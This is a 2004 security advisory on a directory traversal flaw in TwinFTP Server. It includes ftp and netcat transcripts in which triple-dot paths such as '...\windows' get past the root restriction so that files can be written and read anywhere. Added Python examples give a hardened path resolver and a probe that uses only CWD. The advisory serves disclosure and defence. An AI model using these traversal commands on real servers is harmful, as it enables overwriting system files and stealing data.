SIG^2 Vulnerability Research Advisory

Directory Traversal Vulnerability in TwinFTP Server allows overwriting of files outside FTP directory

by Tan Chew Keong
Release Date: 12 Sep 2004

Summary

TwinFTP Server is an FTP server released by Jigunet Corporation for the Windows platform. A directory traversal vulnerability in TwinFTP Server allows a malicious user to access files outside the FTP directory. It may also be exploited to bypass the directory restrictions enforced by the FTP server and write arbitrary files into any directory that the server process has access to.

 
Tested System

TwinFTP Server Standard 1.0.3 R2 (Win32) on English WinXP SP1.
TwinFTP Server Enterprise 1.0.3 R2 (Win32) on English Win2K SP2.

 
Details

A directory traversal vulnerability exists in several FTP commands of TwinFTP that may be exploited by a malicious user to access files outside the FTP directory. The problem lies in the incorrect filtering of the directory or file name supplied to the CWD, STOR and RETR commands: the server refuses a literal ".." component, but a component consisting of three dots followed by a path separator is not caught, e.g. ".../winnt" or "...\windows", and is resolved by the operating system as a step into the parent directory.

This vulnerability may be exploited to bypass the directory restrictions enforced by the FTP server and write arbitrary files into any directory that the server process has access to. This is critical because, if TwinFTP Server runs with Administrator privilege (the usual case for a Windows service), a malicious user can overwrite system files within the Windows directory.
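The following is an added example written for this page; it is not TwinFTP code and the advisory does not show how TwinFTP filtered its arguments. It contrasts a hypothetical filter that refuses only the literal ".." component (which lets "...\windows" through, matching the behaviour in the transcripts below) with a hardened resolver that allow-lists plain name components and then confirms the resolved path still lies under the FTP root. The root "/ftproot" stands in for C:\ftproot.

```python
# Added example (not part of the advisory and not TwinFTP code): a hypothetical
# ".."-only filter of the kind that lets "...\windows" through, beside a hardened
# resolver that confines every CWD/STOR/RETR argument to the FTP root.
import posixpath
import re

SEPARATORS = re.compile(r"[\\/]+")   # clients send either '\' or '/'; treat both alike


def split_components(arg: str) -> list:
    """Split an FTP path argument on both Windows and POSIX separators."""
    return [c for c in SEPARATORS.split(arg) if c != ""]


def naive_filter_allows(arg: str) -> bool:
    """Hypothetical weak check: only a component that is exactly '..' is refused.
    '...' passes, yet the OS resolves it as a step into the parent directory."""
    return all(c != ".." for c in split_components(arg))


def resolve_within_root(root: str, cwd: str, arg: str):
    """Map (real root, virtual cwd, client argument) to the path the server may touch.

    Returns the resolved path, or None when the argument must be refused.
    root is the real FTP home (POSIX-style here, e.g. '/ftproot' for C:\\ftproot);
    cwd is the client's virtual directory relative to that root ('/' at login).
    """
    root = root.rstrip("/") or "/"
    # A leading separator restarts at the virtual root, never at the disk root.
    virtual = [] if re.match(r"[\\/]", arg) else [c for c in cwd.split("/") if c]
    for comp in split_components(arg):
        if comp == ".":
            continue
        # Any component made only of dots ('..', '...', '....') is a traversal
        # attempt: allow-list plain names instead of deny-listing the literal '..'.
        if set(comp) == {"."}:
            return None
        # Windows strips trailing dots and spaces, and ':' introduces drive
        # letters or alternate data streams; refuse rather than guess.
        if comp != comp.rstrip(". ") or ":" in comp or "\x00" in comp:
            return None
        virtual.append(comp)
    resolved = posixpath.normpath(posixpath.join(root, *virtual))
    # Belt and braces: whatever normalisation did, the result must stay under root.
    if resolved != root and not resolved.startswith(root + "/"):
        return None
    return resolved
```

The point of the hardened version is that it never asks "does this look like '..'"; it accepts only components that are plain names and then checks the final path against the root, so a new spelling of the parent reference cannot reopen the hole.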

This vulnerability is illustrated in the following examples. In these examples, the FTP server is configured to allow the anonymous user read-only access to the FTP home directory at C:\ftproot. The anonymous user is not allowed to create files or directories in C:\ftproot.

C:\>ftp 192.168.1.7
Connected to 192.168.1.7.
220 TwinFTP Server Standard 1.0.3 R2 (win32)
User (192.168.1.7:(none)): anonymous
331 Need password.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ..
550 CDUP command failure, need account.
ftp> cd ...\windows				Using triple dots ... to change directory to C:\windows
250 Directory changed to ...\windows
ftp> cd ..					
250 CDUP command successfully.				Now we are at C:\
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
ntldr							Directory listing of C:\
NTDETECT.COM
boot.ini
CONFIG.SYS
AUTOEXEC.BAT
IO.SYS
MSDOS.SYS
pagefile.sys
nessuswx.dbg
_NavCClt.Log
uspscan.cab

226 Data transfer successfully.
ftp: 133 bytes received in 0.01Seconds 13.30Kbytes/sec.
ftp>

The above example illustrates how the use of triple dots allows a malicious user to escape from the FTP root directory. The next example shows how a malicious user can then write and overwrite arbitrary files on the FTP server, including files in the FTP root that the account is otherwise not permitted to write.
 
C:\>ftp 192.168.1.7
Connected to 192.168.1.7.
220 TwinFTP Server Standard 1.0.3 R2 (win32)
User (192.168.1.7:(none)): anonymous
331 Need password.
Password:
230 User logged in, proceed.
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
.								Directory listing of C:\ftproot
..
file1.txt

226 Data transfer successfully.
ftp: 20 bytes received in 0.00Seconds 20000.00Kbytes/sec.
ftp> put a.txt
200 PORT command OK.
550 Access denied, command failure.			We are not allowed to write files to c:\ftproot
ftp> cd ...\windows
250 Directory changed to ...\windows
ftp> put a.txt
200 PORT command OK.
150 Opening ASCII mode data connection for a.txt.
226 Data transfer successfully.				Wrote a file to C:\windows
ftp: 6 bytes sent in 0.00Seconds 6000.00Kbytes/sec.
ftp> cd ..\ftproot
250 Directory changed to ..\ftproot			We are now back to C:\ftproot
ftp> put a.txt
200 PORT command OK.
150 Opening ASCII mode data connection for a.txt.
226 Data transfer successfully.				We can now write a file to C:\ftproot
ftp: 6 bytes sent in 0.01Seconds 0.60Kbytes/sec.
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
file1.txt							Directory listing of C:\ftproot
a.txt

226 Data transfer successfully.
ftp: 20 bytes received in 0.01Seconds 2.00Kbytes/sec.
ftp>

It is also possible to write files outside the FTP directory directly by passing the traversal sequence to the STOR command, as illustrated below; the file is created even though the data connection fails. The RETR command is vulnerable in the same way and may be used to retrieve files outside the FTP root.
 
c:\>nc 192.168.1.7 21
220 TwinFTP Server Standard 1.0.3 R2 (win32)
USER anonymous
331 Need password.
PASS 1234
230 User logged in, proceed.
PORT 192,168,1,3,7,209
200 PORT command OK.
STOR ...\a.txt
425 Cannot create data connection.			A zero-byte file a.txt has been created in C:\
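The exchanges above, turned into a non-destructive probe, as an added example that is not part of the advisory and not TwinFTP code. The probe logs in, confirms that "CWD .." is refused, and then checks whether "CWD ...\windows" is accepted; it never issues STOR, so nothing is written on the target. The stand-in server is constructed here from the reply strings shown in the transcripts so the probe can be run offline; the real-socket helper, the probe password and the "221 Goodbye." reply are assumptions of this example. Only probe hosts you are authorised to test.

```python
# Added example (not part of the advisory and not TwinFTP code): a non-destructive
# probe for the "..." traversal that replays the CWD exchange from the transcripts,
# plus a constructed stand-in server that answers with the reply codes the
# advisory shows, so the probe can be exercised offline.
import re
import socket


def ftp_control_channel(host: str, port: int = 21, timeout: float = 10.0):
    """Open a real FTP control connection (host/port are the caller's assumptions).

    Returns (banner, send) where send(cmd) writes one command and returns the
    complete reply, including multi-line replies ('220-...' up to '220 ...').
    """
    sock = socket.create_connection((host, port), timeout=timeout)
    rfile = sock.makefile("r", encoding="latin-1", newline="\r\n")

    def read_reply() -> str:
        lines = []
        while True:
            line = rfile.readline()
            if not line:
                raise ConnectionError("control connection closed")
            line = line.rstrip("\r\n")
            lines.append(line)
            if len(line) >= 4 and line[:3].isdigit() and line[3] == " ":
                return "\n".join(lines)

    def send(cmd: str) -> str:
        sock.sendall((cmd + "\r\n").encode("latin-1"))
        return read_reply()

    return read_reply(), send


def probe_triple_dot_traversal(send, user: str = "anonymous",
                               password: str = "probe@example.com") -> dict:
    """Log in, confirm 'CWD ..' is refused, then see whether 'CWD ...\\windows' succeeds.

    Nothing is written: only CWD is used, so a vulnerable server is left untouched.
    """
    send(f"USER {user}")
    login = send(f"PASS {password}")
    if not login.startswith("230"):
        return {"vulnerable": None, "reason": "login refused: " + login}
    dotdot = send("CWD ..")               # a confined server answers 5xx (transcript: 550)
    tripledot = send("CWD ...\\windows")  # the bypass: '...' slips past a '..'-only filter
    send("QUIT")
    return {
        "vulnerable": tripledot.startswith("250"),
        "confined_against_dotdot": not dotdot.startswith("2"),
        "cwd_dotdot": dotdot,
        "cwd_tripledot": tripledot,
    }


def fake_twinftp(patched: bool):
    """Constructed stand-in replaying the advisory's reply strings; not the real server.

    patched=False refuses only a literal '..' component, as the 1.0.3 R2 transcript
    shows; patched=True refuses every all-dot component.
    """
    def send(cmd: str) -> str:
        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            return "331 Need password."
        if verb == "PASS":
            return "230 User logged in, proceed."
        if verb == "CWD":
            comps = [c for c in re.split(r"[\\/]+", arg) if c]
            blocked = any(c == ".." for c in comps) or (
                patched and any(set(c) == {"."} for c in comps))
            if blocked:
                return "550 CDUP command failure, need account."
            return f"250 Directory changed to {arg}"
        if verb == "QUIT":
            return "221 Goodbye."   # assumed reply; not shown in the advisory
        return "500 Unknown command."
    return send


if __name__ == "__main__":
    # Offline run against the stand-in. To probe a real host you are authorised
    # to test, use: banner, send = ftp_control_channel("192.168.1.7"); then pass send.
    print(probe_triple_dot_traversal(fake_twinftp(patched=False)))
```

A server that answers 250 to "CWD ...\windows" after refusing "CWD .." is exhibiting exactly the inconsistency the advisory describes; checking both replies avoids a false positive on a server that simply grants the account full filesystem access.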

 
Patch

Upgrade to Version 1.0.3 R3 as re-released by the vendor on 10 Sep 2004. Note that the version number did not change between the two builds: the Version 1.0.3 R3 first released on 13 Aug 2004 fixes the CWD traversal only, and its RETR and STOR commands remain vulnerable. Confirm that the installed build was obtained on or after 10 Sep 2004 rather than relying on the version string.

 
Disclosure Timeline

02 Aug 04 - Vulnerability Discovered
04 Aug 04 - Initial Vendor Notification (no reply)
09 Aug 04 - Second Vendor Notification
13 Aug 04 - Vendor released Version 1.0.3 R3, which fixes the directory traversal in CWD; the RETR and STOR commands are still vulnerable
13 Aug 04 - Notified vendor about RETR and STOR vulnerability (no reply)
30 Aug 04 - Second vendor notification about RETR and STOR vulnerability
10 Sep 04 - Vendor re-released Version 1.0.3 R3 which fixes RETR and STOR commands.
12 Sep 04 - Public Release

 

Contacts

For further questions and enquiries, email the following.

Overall-in-charge: Tan Chew Keong


Updated: 10/9/2004
webmaster@security.org.sg